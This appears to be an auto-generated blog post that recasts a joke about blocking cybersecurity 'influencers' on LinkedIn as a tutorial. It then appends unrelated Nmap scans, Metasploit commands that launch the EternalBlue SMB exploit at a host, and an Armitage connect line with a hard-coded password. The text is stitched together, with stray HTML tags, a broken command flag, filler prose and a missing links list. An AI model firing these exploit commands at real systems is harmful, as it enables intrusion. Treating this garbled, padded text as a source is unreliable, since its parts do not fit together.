How to Block Cyber Influencers on LinkedIn: A Speedrun Tutorial

Listen to this Post

In this guide, we’ll walk you through the steps to block cyber influencers on LinkedIn, ensuring a cleaner and more professional feed. The process is straightforward and can be repeated as needed to maintain a healthy LinkedIn experience.

Steps to Block Cyber Influencers:

  1. Identify a Post with Dubious Content: Look for posts that promote questionable tools or tutorials, such as “Tuto Armitage en 2025” or “Game-changer tools” that are often just wrappers for existing tools like Nmap.
  2. Leave a Polite Comment: Avoid being overly harsh. A simple, sarcastic comment like “Thanks, now I can finally pass my CEH!” can suffice.
  3. Block the User: Once you’ve identified the influencer, block them to remove their content from your feed.
  4. Repeat as Necessary: Continue this process to keep your LinkedIn feed free from unnecessary noise.

You Should Know:

Here are some practical commands and tools to help you in your cybersecurity journey, especially when dealing with network scanning and penetration testing:

  • Nmap Commands:
    </li>
    </ul>
    
    <h1>Basic scan</h1>
    
    nmap -sP 192.168.1.0/24
    
    <h1>Aggressive scan</h1>
    
    nmap -A 192.168.1.1
    
    <h1>Scan for specific ports</h1>
    
    nmap -p 22,80,443 192.168.1.1
    
    • Metasploit Commands:
      </li>
      </ul>
      
      <h1>Start Metasploit console</h1>
      
      msfconsole
      
      <h1>Search for exploits</h1>
      
      search exploit/windows/smb/ms17_010_eternalblue
      
      <h1>Use an exploit</h1>
      
      use exploit/windows/smb/ms17_010_eternalblue
      set RHOSTS 192.168.1.1
      exploit
      
      • Armitage Commands:
        </li>
        </ul>
        
        <h1>Start Armitage</h1>
        
        armitage
        
        <h1>Connect to Metasploit RPC</h1>
        
        connect -h 127.0.0.1 -p 55553 -u msf -p password
        

        What Undercode Say:

        Blocking cyber influencers on LinkedIn is a small but significant step towards maintaining a professional and informative feed. By using tools like Nmap, Metasploit, and Armitage, you can enhance your cybersecurity skills and stay ahead of the curve. Remember, the key to a successful cybersecurity career is continuous learning and practice. Keep your environment clean, both online and offline, and always stay curious.

        For more detailed tutorials and resources, consider visiting:

        By following these steps and utilizing these tools, you can ensure a more productive and focused LinkedIn experience while advancing your cybersecurity expertise.

        References:

        Reported By: Activity 7303515049988349954 – Hackers Feeds
        Extra Hub: Undercode MoN
        Basic Verification: Pass ✅

        Join Our Cyber World:

        Whatsapp
        TelegramFeatured Image